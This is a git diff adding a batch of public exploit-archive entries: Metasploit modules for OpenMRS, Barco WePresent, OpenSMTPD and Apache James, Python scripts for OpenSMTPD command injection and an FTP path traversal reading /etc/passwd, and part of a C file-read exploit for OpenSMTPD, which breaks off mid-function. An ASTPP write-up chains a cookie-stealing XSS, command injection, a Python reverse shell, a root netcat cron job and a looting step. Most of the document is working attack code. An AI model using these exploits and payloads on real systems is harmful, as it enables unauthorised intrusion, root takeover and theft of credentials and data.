+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+       [
+         [ 'Linux',
+           {
+             'Arch'             =>  [ ARCH_X86, ARCH_X64 ],
+             'Platform'         =>  [ 'unix', 'linux' ],
+             'CmdStagerFlavor'  => 'printf'
+           }
+         ]
+       ],
+      'DisclosureDate' => '2019-02-04',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      Opt::RPORT(8081),
+      OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
+    ])
+
+    register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
+  end
+
+  def check
+    res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
+    return CheckCode::Unknown("OpenMRS page unreachable.") unless res
+
+    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')
+    response = res.get_html_document
+    version = response.at('body//h3')
+    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text
+
+    version_no = version.text
+    version_no = version_no.match(/\d+\.\d+\.\d*/)
+    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no
+
+    version_no = Gem::Version.new(version_no)
+
+    if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3')))
+      return CheckCode::Appears("OpenMRS platform version: #{version_no}")
+    end
+
+    CheckCode::Safe
+  end
+
+  def format_payload
+    payload_data = payload.encoded.to_s.encode(xml: :text)
+    payload_arr = payload_data.split(' ', 3)
+    payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "")
+  end
+
+  def read_payload_data(payload_cmd)
+    # payload generated with Marshalsec
+    erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb')
+    payload_data = File.binread(erb_path)
+    payload_data = ERB.new(payload_data).result(binding)
+
+  rescue Errno::ENOENT
+    fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}")
+  end
+
+  def execute_command(cmd, opts={})
+    cmd = cmd.encode(xml: :text)
+    xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>"
+    rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept')
+    payload_data = read_payload_data(xml_data)
+
+    send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  rest_uri,
+      'headers'   =>  { 'Content-Type'  =>  'text/xml' },
+      'data'      =>  payload_data
+    )
+  end
+
+  def exploit
+    chk_status = check
+    print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears
+    unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'] )
+      fail_with(Failure::NoTarget, 'Target is not vulnerable')
+    end
+
+    cmds = generate_cmdstager(:concat_operator => '&&')
+    print_status('Sending payload...')
+    cmds.first.split('&&').map { |cmd| execute_command(cmd) }
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47889.txt b/exploits/linux/remote/47889.txt
new file mode 100644
index 000000000..5db71c763
--- /dev/null
+++ b/exploits/linux/remote/47889.txt
@@ -0,0 +1,72 @@
+# Exploit Title: ASTPP VoIP 4.0.1 - Remote Code Execution
+# Date: 2019-11-18
+# Exploit Author: Fabien AUNAY
+# Vendor Homepage: https://www.astppbilling.org/
+# Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1
+# Version: 4.0.1 vendor default setup script
+# Tested on: Debian 9 - CentOS 7
+# CVE : -
+
+###########################################################################################################
+ASTPP 4.0.1 VoIP Billing Chained Remote Root
+A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers!
+It is available as an open source solution. It means without any investment, one can start his telephony
+business using ASTPP.
+ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a
+comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing
+solution to “A Smart TelePhony Platform”.
+The latest version of ASTPP is provisioned with some advanced functional modules which are designed
+to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class
+4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart
+Technology.
+
+Steps are as follows:
+Objective 1 : Edit the SIP device and try to test user inputs
+Objective 2 : Try to trigger a XSS
+Objective 3 : Try to evade filters
+Objective 4 : Session Hijack
+Objective 5 : Plugin command injection
+Objective 6 : Reverse shell
+Objective 7 : Root the system
+Objective 8 : Looting
+
+###########################################################################################################
+
+Objective 1 : html code in SIP Caller Number
+POC: <b>ASTPP html test</b>
+
+Objective 2 : XSS injection in SIP Caller Name
+POC: <svg/onload=alert('XsS-Inj3cTIoN')>
+
+Objective 3 : XSS document.cookie evasion
+POC: <svg/onload=alert(document/*foo*/./*bar*/cookie)>
+
+Objective 4 : XSS document.cookie grabber
+POC: <svg/onload=window.open("http://127.0.0.1:8080/?"+document/*foo*/./*bar*/cookie)>
+
+Alternative : if the user input is limited, it is possible in some cases to modify the length with the inspector
+POC: <input data-ripple="" type="text" name="name" value="1" placeholder="" size="20" maxlength="30" class="col-md-12 form-control form-control-lg">
+POC': <input data-ripple="" type="text" name="name" value="1" placeholder="" size="20" maxlength="250" class="col-md-12 form-control form-control-lg">
+
+Objective 5 : Plugin command injection
+After administrator cookie and session hijack, it is possible to install some stuff. ASTPP allows one of the best to perform a system command injection.
+The get addons sub menu, allow attacker to install “Switch Monitoring”. Use the system command followed by your instructions and press 'Submit'
+POC : system date;id;whoami
+
+Objective 6 : Reverse shell
+POC: system python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+Objective 7 : Root the system
+A vulnerability was identified in web Crons menu. The cron task was executed with root permissions due to a wrong configuration of the installation script.
+Before use it, you should step back to your reverse shell and check the date of the server.
+
+POC:
+Name: Exploit cron
+Command: nc 127.0.0.1 8080 -e /bin/bash
+Interval Type: Minute
+Interval: 1
+Next Execution Date: xxxx-xx-xx yy:yy:yy
+Status: Active
+
+Objective 8 : Looting
+The /var/lib/astpp/astpp-config.conf file contains all information to explore the database.
\ No newline at end of file
diff --git a/exploits/linux/remote/47924.rb b/exploits/linux/remote/47924.rb
new file mode 100755
index 000000000..59aba88a5
--- /dev/null
+++ b/exploits/linux/remote/47924.rb
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Barco WePresent file_transfer.cgi Command Injection",
+      'Description'    => %q(
+        This module exploits an unauthenticated remote command injection
+        vulnerability found in Barco WePresent and related OEM'ed products.
+        The vulnerability is triggered via an HTTP POST request to the
+        file_transfer.cgi endpoint.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => 'Jacob Baines', # @Junior_Baines'
+      'References'     =>
+        [
+          ['CVE', '2019-3929'],
+          ['EDB', '46786'],
+          ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
+        ],
+      'DisclosureDate' => "Apr 30, 2019",
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Unix In-Memory',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {
+           'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
+         }],
+        ['Linux Dropper',
+         'Platform'        => 'linux',
+         'Arch'            => ARCH_ARMLE,
+         'CmdStagerFlavor' => ['printf', 'wget'],
+         'Type'            => :linux_dropper]
+      ],
+      'DefaultTarget'  => 1,
+      'DefaultOptions' => {
+        'SSL'               => true,
+        'RPORT'             => 443,
+        'CMDSTAGER::FLAVOR' => 'printf',
+        'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp'
+      }))
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/;/, 'Pa_Note')
+    cmd.gsub!(/\+/, 'Pa_Add')
+    cmd.gsub!(/&/, 'Pa_Amp')
+    return cmd
+  end
+
+  def send_command(cmd, timeout)
+    vars_post = {
+      file_transfer: 'new',
+      dir: "'#{filter_bad_chars(cmd)}'"
+    }
+
+    send_request_cgi({
+      'uri'       => '/cgi-bin/file_transfer.cgi',
+      'method'    => 'POST',
+      'vars_post' => vars_post
+    }, timeout)
+  end
+
+  def check
+    check_resp = send_command(";whoami;", 5)
+    unless check_resp
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    if check_resp.code == 200
+      check_resp.body.gsub!(/[\r\n]/, "")
+      if check_resp.body == "root"
+        return CheckCode::Vulnerable
+      end
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_command(";(#{cmd})&", nil)
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(linemax: 128)
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47956.py b/exploits/linux/remote/47956.py
new file mode 100755
index 000000000..f7f0045a1
--- /dev/null
+++ b/exploits/linux/remote/47956.py
@@ -0,0 +1,19 @@
+# Exploit Title: Pachev FTP Server 1.0 - Path Traversal
+# Date: 2020-01-23
+# Vulnerability: Path Traversal
+# Exploit Author: 1F98D
+# Vendor Homepage: https://github.com/pachev/pachev_ftp
+
+from ftplib import FTP
+
+ip = raw_input("Target IP: ")
+port = int(raw_input("Target Port: "))
+
+ftp = FTP()
+ftp.connect(host=ip, port=port)
+ftp.login('pachev', '')                   
+ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write)
+ftp.close()
+file = open('passwd.txt', 'r')
+print "[**] Printing the contents of /etc/passwd\n"
+print file.read()
\ No newline at end of file
diff --git a/exploits/linux/remote/47984.py b/exploits/linux/remote/47984.py
new file mode 100755
index 000000000..2c838c8db
--- /dev/null
+++ b/exploits/linux/remote/47984.py
@@ -0,0 +1,68 @@
+# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
+# Date: 2020-01-29
+# Exploit Author: 1F98D
+# Original Author: Qualys Security Advisory
+# Vendor Homepage: https://www.opensmtpd.org/
+# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
+# Version: OpenSMTPD < 6.6.2
+# Tested on: Debian 9.11 (x64)
+# CVE: CVE-2020-7247
+# References:
+# https://www.openwall.com/lists/oss-security/2020/01/28/3
+#
+# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
+# escape dangerous characters from user-controlled input. An attacker
+# can exploit this to execute arbitrary shell commands on the target.
+# 
+#!/usr/local/bin/python3
+
+from socket import *
+import sys
+
+if len(sys.argv) != 4:
+    print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
+    print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
+    sys.exit(1)
+
+ADDR = sys.argv[1]
+PORT = int(sys.argv[2])
+CMD = sys.argv[3]
+
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((ADDR, PORT))
+
+res = s.recv(1024)
+if 'OpenSMTPD' not in str(res):
+    print('[!] No OpenSMTPD detected')
+    print('[!] Received {}'.format(str(res)))
+    print('[!] Exiting...')
+    sys.exit(1)
+
+print('[*] OpenSMTPD detected')
+s.send(b'HELO x\r\n')
+res = s.recv(1024)
+if '250' not in str(res):
+    print('[!] Error connecting, expected 250')
+    print('[!] Received: {}'.format(str(res)))
+    print('[!] Exiting...')
+    sys.exit(1)
+
+print('[*] Connected, sending payload')
+s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
+res = s.recv(1024)
+if '250' not in str(res):
+    print('[!] Error sending payload, expected 250')
+    print('[!] Received: {}'.format(str(res)))
+    print('[!] Exiting...')
+    sys.exit(1)
+
+print('[*] Payload sent')
+s.send(b'RCPT TO:<root>\r\n')
+s.recv(1024)
+s.send(b'DATA\r\n')
+s.recv(1024)
+s.send(b'\r\nxxx\r\n.\r\n')
+s.recv(1024)
+s.send(b'QUIT\r\n')
+s.recv(1024)
+print('[*] Done')
\ No newline at end of file
diff --git a/exploits/linux/remote/48038.rb b/exploits/linux/remote/48038.rb
new file mode 100755
index 000000000..43a9d6e67
--- /dev/null
+++ b/exploits/linux/remote/48038.rb
@@ -0,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Expect
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OpenSMTPD MAIL FROM Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a command injection in the MAIL FROM field during
+        SMTP interaction with OpenSMTPD to execute code as the root user.
+      },
+      'Author'         => [
+        'Qualys',                               # Discovery and PoC
+        'wvu',                                  # Module
+        'RageLtMan <rageltman[at]sempervictus>' # Module
+      ],
+      'References'     => [
+        ['CVE', '2020-7247'],
+        ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']
+      ],
+      'DisclosureDate' => '2020-01-28',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => true,
+      'Targets'        => [
+        ['OpenSMTPD >= commit a8e222352f',
+          'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
+        ]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
+    ))
+
+    register_options([
+      Opt::RPORT(25),
+      OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit',   [false, 'Override check result', false]),
+      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
+    ])
+  end
+
+  def check
+    connect
+    res = sock.get_once
+
+    return CheckCode::Unknown unless res
+    return CheckCode::Detected if res =~ /^220.*OpenSMTPD/
+
+    CheckCode::Safe
+  rescue EOFError, Rex::ConnectionError => e
+    vprint_error(e.message)
+    CheckCode::Unknown
+  ensure
+    disconnect
+  end
+
+  def exploit
+    unless datastore['ForceExploit']
+      unless check == CheckCode::Detected
+        fail_with(Failure::Unknown, 'Set ForceExploit to override')
+      end
+    end
+
+    # We don't care who we are, so randomize it
+    me = rand_text_alphanumeric(8..42)
+
+    # Send mail to this valid recipient
+    to = datastore['RCPT_TO']
+
+    # Comment "slide" courtesy of Qualys - brilliant!
+    iter = rand_text_alphanumeric(15).chars.join(' ')
+    from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"
+
+    # This is just insurance, since the code was already written
+    if from.length > 64
+      fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
+    elsif (badchars = (from.chars & target['MyBadChars'])).any?
+      fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
+    end
+
+    # Create the mail body with comment slide and payload
+    body = "\r\n" + "#\r\n" * 15 + payload.encoded
+
+    sploit = {
+      nil                   => /220.*OpenSMTPD/,
+      "HELO #{me}"          => /250.*pleased to meet you/,
+      "MAIL FROM:<#{from}>" => /250.*Ok/,
+      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
+      'DATA'                => /354 Enter mail.*itself/,
+      body                  => nil,
+      '.'                   => /250.*Message accepted for delivery/,
+      'QUIT'                => /221.*Bye/
+    }
+
+    print_status('Connecting to OpenSMTPD')
+    connect
+
+    print_status('Saying hello and sending exploit')
+    sploit.each do |line, pattern|
+      send_expect(
+        line,
+        pattern,
+        sock:    sock,
+        timeout: datastore['ExpectTimeout'],
+        newline: "\r\n"
+      )
+    end
+  rescue Rex::ConnectionError => e
+    fail_with(Failure::Unreachable, e.message)
+  rescue Timeout::Error => e
+    fail_with(Failure::TimeoutExpired, e.message)
+  ensure
+    disconnect
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/48130.rb b/exploits/linux/remote/48130.rb
new file mode 100755
index 000000000..71e4c3c92
--- /dev/null
+++ b/exploits/linux/remote/48130.rb
@@ -0,0 +1,198 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
+      'Description'    => %q{
+        This module exploits a vulnerability that exists due to a lack of input
+        validation when creating a user. Messages for a given user are stored
+        in a directory partially defined by the username. By creating a user
+        with a directory traversal payload as the username, commands can be
+        written to a given directory. To use this module with the cron
+        exploitation method, run the exploit using the given payload, host, and
+        port. After running the exploit, the payload will be executed within 60
+        seconds. Due to differences in how cron may run in certain Linux
+        operating systems such as Ubuntu, it may be preferable to set the
+        target to Bash Completion as the cron method may not work. If the target
+        is set to Bash completion, start a listener using the given payload,
+        host, and port before running the exploit. After running the exploit,
+        the payload will be executed when a user logs into the system. For this
+        exploitation method, bash completion must be enabled to gain code
+        execution. This exploitation method will leave an Apache James mail
+        object artifact in the /etc/bash_completion.d directory and the
+        malicious user account.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'Palaczynski Jakub', # Discovery
+        'Matthew Aberegg',   # Metasploit
+        'Michael Burkey'     # Metasploit
+      ],
+      'References'     =>
+      [
+        [ 'CVE', '2015-7611' ],
+        [ 'EDB', '35513' ],
+        [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]
+      ],
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+      [
+        [ 'Bash Completion', {
+          'ExploitPath' => 'bash_completion.d',
+          'ExploitPrepend' => '',
+          'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 }
+        } ],
+        [ 'Cron', {
+          'ExploitPath' => 'cron.d',
+          'ExploitPrepend' => '* * * * * root ',
+          'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 }
+        } ]
+      ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Oct 1 2015",
+      'DefaultTarget'  => 1,
+      'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ]
+      ))
+      register_options(
+        [
+          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
+          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
+          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),
+          OptString.new('POP3PORT', [false, 'Port for POP3 Apache James Service', '110' ]),
+          Opt::RPORT(25)
+        ])
+    import_target_defaults
+  end
+
+  def check
+    # SMTP service check
+    connect
+    smtp_banner = sock.get_once
+    disconnect
+    unless smtp_banner.to_s.include? "JAMES SMTP Server"
+      return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
+    end
+
+    # James Remote Administration Tool service check
+    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
+    admin_banner = sock.get_once
+    disconnect
+    unless admin_banner.to_s.include? "JAMES Remote Administration Tool"
+      return CheckCode::Safe("Target is not JAMES Remote Administration Tool")
+    end
+
+    # Get version number
+    version = admin_banner.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first
+    # Null check
+    unless version
+      return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")
+    end
+    # Create version objects
+    target_version = Gem::Version.new(version)
+    vulnerable_version = Gem::Version.new("2.3.2")
+
+    # Check version number
+    if target_version > vulnerable_version
+      return CheckCode::Safe
+    elsif target_version == vulnerable_version
+      return CheckCode::Appears
+    elsif target_version < vulnerable_version
+      return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable")
+    end
+  end
+
+  def execute_james_admin_tool_command(cmd)
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
+    sock.get_once
+    sock.puts(username + "\n")
+    sock.get_once
+    sock.puts(password + "\n")
+    sock.get_once
+    sock.puts(cmd)
+    sock.get_once
+    sock.puts("quit\n")
+    disconnect
+  end
+
+  def cleanup
+    return unless target['ExploitPath'] == "cron.d"
+    # Delete mail objects containing payload from cron.d
+    username = "../../../../../../../../etc/cron.d"
+    password = @account_password
+    begin
+      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']})
+      sock.get_once
+      sock.puts("USER #{username}\r\n")
+      sock.get_once
+      sock.puts("PASS #{password}\r\n")
+      sock.get_once
+      sock.puts("dele 1\r\n")
+      sock.get_once
+      sock.puts("quit\r\n")
+      disconnect
+    rescue
+      print_bad("Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password '#{@account_password}'")
+    end
+
+    # Delete malicious user
+    delete_user_command = "deluser ../../../../../../../../etc/cron.d\n"
+    execute_james_admin_tool_command(delete_user_command)
+  end
+
+  def execute_command(cmd, opts = {})
+    # Create malicious user with randomized password (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d)
+    exploit_path = target['ExploitPath']
+    @account_password = Rex::Text.rand_text_alpha(8..12)
+    add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@account_password}\n"
+    execute_james_admin_tool_command(add_user_command)
+
+    # Send payload via SMTP
+    payload_prepend = target['ExploitPrepend']
+    connect
+    sock.puts("ehlo admin@apache.com\r\n")
+    sock.get_once
+    sock.puts("mail from: <'@apache.com>\r\n")
+    sock.get_once
+    sock.puts("rcpt to: <../../../../../../../../etc/#{exploit_path}>\r\n")
+    sock.get_once
+    sock.puts("data\r\n")
+    sock.get_once
+    sock.puts("From: admin@apache.com\r\n")
+    sock.puts("\r\n")
+    sock.puts("'\n")
+    sock.puts("#{payload_prepend}#{cmd}\n")
+    sock.puts("\r\n.\r\n")
+    sock.get_once
+    sock.puts("quit\r\n")
+    sock.get_once
+    disconnect
+  end
+
+  def execute_cmdstager_end(opts)
+    if target['ExploitPath'] == "cron.d"
+      print_status("Waiting for cron to execute payload...")
+    else
+      print_status("Payload will be triggered when someone logs onto the target")
+      print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'")
+      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")
+    end
+  end
+
+  def exploit
+    execute_cmdstager(background: true)
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/48139.c b/exploits/linux/remote/48139.c
new file mode 100644
index 000000000..2bcca9bf4
--- /dev/null
+++ b/exploits/linux/remote/48139.c
@@ -0,0 +1,573 @@
+# Title: OpenSMTPD 6.6.3 - Arbitrary File Read
+# Date: 2020-02-20
+# Author: qualys
+# Vendor: https://www.opensmtpd.org/
+# CVE: 2020-8793
+
+/*
+ * Local information disclosure in OpenSMTPD (CVE-2020-8793)
+ * Copyright (C) 2020 Qualys, Inc.
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <https://www.gnu.org/licenses/>.
+ */
+
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/stat.h>
+#include <sys/sysctl.h>
+#include <sys/wait.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <fts.h>
+#include <limits.h>
+#include <pwd.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define P_SUSPSIG       0x08000000      /* Stopped from signal. */
+
+#define PATH_SPOOL              "/var/spool/smtpd"
+#define PATH_OFFLINE            "/offline"
+#define OFFLINE_QUEUEMAX        5
+
+#define die() do { \
+    printf("died in %s: %u\n", __func__, __LINE__); \
+    exit(EXIT_FAILURE); \
+} while (0)
+
+static const char * const *
+create_files(const size_t n_files)
+{
+    size_t f;
+    for (f = 0; f < n_files; f++) {
+        char file[] = PATH_SPOOL PATH_OFFLINE "/0.XXXXXXXXXX";
+        const int fd = mkstemp(file);
+        if (fd <= -1) die();
+
+        if (file[sizeof(file)-1] != '\0') die();
+        file[sizeof(file)-1] = '\n';
+        if (write(fd, file, sizeof(file)) != (ssize_t)sizeof(file)) die();
+        if (close(fd) != 0) die();
+    }
+
+    const char ** const files = calloc(n_files, sizeof(char *));
+    if (files == NULL) die();
+
+    char * const paths[] = { PATH_SPOOL PATH_OFFLINE, NULL };
+    FTS * const fts = fts_open(paths, FTS_PHYSICAL | FTS_NOCHDIR, NULL);
+    if (fts == NULL) die();
+
+    for (f = 0; ; ) {
+        const FTSENT * const ent = fts_read(fts);
+        if (ent == NULL) break;
+        if (ent->fts_name[0] != '0') continue;
+        if (ent->fts_name[1] != '.') continue;
+
+        if (ent->fts_info != FTS_F) die();
+        if (ent->fts_level != 1) die();
+        if (ent->fts_statp->st_gid != ent->fts_parent->fts_statp->st_gid) die();
+        if (ent->fts_statp->st_size <= 0) die();
+
+        const char * const file = strdup(ent->fts_path);
+        if (file == NULL) die();
+        if (f >= n_files) die();
+        files[f++] = file;
+    }
+    if (f != n_files) die();
+    if (fts_close(fts) != 0) die();
+
+    if (truncate(files[n_files - 1], 0) != 0) die();
+    return files;
+}
+
+static void
+wait_sentinel(const char * const * const files, const size_t n_files)
+{
+    for (;;) {
+        struct stat sb;
+        if (lstat(files[n_files - 1], &sb) != 0) {
+            if (errno != ENOENT) die();
+            return;
+        }
+        if (!S_ISREG(sb.st_mode)) die();
+        if (sb.st_size != 0) die();
+    }
+    die();
+}
+
+static void
+kill_wait(const pid_t pid)
+{
+    if (kill(pid, SIGKILL) != 0) die();
+
+    int status = 0;
+    if (waitpid(pid, &status, 0) != pid) die();
+    if (!WIFSIGNALED(status)) die();
+    if (WTERMSIG(status) != SIGKILL) die();
+}
+
+typedef struct {
+    int stop;
+    pid_t pid;
+    int fd;
+} t_stopper;
+
+static t_stopper
+fork_stopper(const uid_t uid)
+{
+    const int stop = (uid == getuid());
+
+    int fds[2];
+    if (pipe(fds) != 0) die();
+    const pid_t pid = fork();
+    if (pid <= -1) die();
+
+    const int fd = fds[!pid];
+    if (close(fds[!!pid]) != 0) die();
+
+    if (pid != 0) {
+        const t_stopper stopper = { .stop = stop, .pid = pid, .fd = fd };
+        return stopper;
+    }
+
+    int proc_mib[] = { CTL_KERN, KERN_PROC, KERN_PROC_RUID, uid, sizeof(struct kinfo_proc), 0 };
+    size_t proc_len = 0;
+    if (sysctl(proc_mib, 6, NULL, &proc_len, NULL, 0) == -1) die();
+    if (proc_len <= 0) proc_len = sizeof(struct kinfo_proc);
+    if (proc_len > ((size_t)1 << 20)) die();
+
+    const size_t proc_max = 0x10 * proc_len;
+    void * const proc_buf = malloc(proc_max);
+    if (proc_buf == NULL) die();
+    if (proc_mib[5] != 0) die();
+    proc_mib[5] = proc_max / sizeof(struct kinfo_proc);
+
+    for (;;) {
+        proc_len = proc_max;
+        if (sysctl(proc_mib, 6, proc_buf, &proc_len, NULL, 0) == -1) die();
+        if (proc_len <= 0) {
+            if (stop) die();
+            continue;
+        }
+        if (proc_len >= proc_max) die();
+
+        const struct kinfo_proc * kp;
+        if (proc_len % sizeof(*kp) != 0) die();
+        for (kp = proc_buf; kp != proc_buf + proc_len; kp++) {
+            if (*(const uint64_t *)kp->p_comm != *(const uint64_t *)"smtpctl") continue;
+            if (kp->p_flag & P_SUSPSIG) continue;
+
+            const pid_t pid = kp->p_pid;
+            if (stop && kill(pid, SIGSTOP) != 0) continue;
+
+            const int argv_mib[] = { CTL_KERN, KERN_PROC_ARGS, pid, KERN_PROC_ARGV };
+            static char argv_buf[ARG_MAX];
+            size_t argv_len = sizeof(argv_buf);
+            if (sysctl(argv_mib, 4, argv_buf, &argv_len, NULL, 0) == -1) {
+                continue;
+            }
+            if (argv_len <= sizeof(char *)) {
+                if (stop) die();
+                continue;
+            }
+            if (argv_len >= sizeof(argv_buf)) die();
+
+            const char * const * const av = (const void *)argv_buf;
+            size_t ac;
+            for (ac = 0; av[ac] != NULL; ac++) {
+                switch (ac) {
+                case 0:
+                    if (strcmp(av[ac], "sendmail") != 0) die();
+                    continue;
+                case 1:
+                    if (strcmp(av[ac], "-S") != 0) die();
+                    continue;
+                case 2:
+                    if (stop) {
+                        if (strncmp(av[ac], PATH_SPOOL PATH_OFFLINE,
+                                     sizeof(PATH_SPOOL PATH_OFFLINE)-1) != 0) die();
+                        static const char ** stopped;
+                        static size_t i_stopped, n_stopped;
+
+                        size_t i;
+                        for (i = 0; i < i_stopped; i++) {
+                            if (strcmp(av[ac], stopped[i]) == 0) break;
+                        }
+                        if (i < i_stopped) break;
+                        if (i != i_stopped) die();
+
+                        if (i_stopped >= n_stopped) {
+                            if (i_stopped != n_stopped) die();
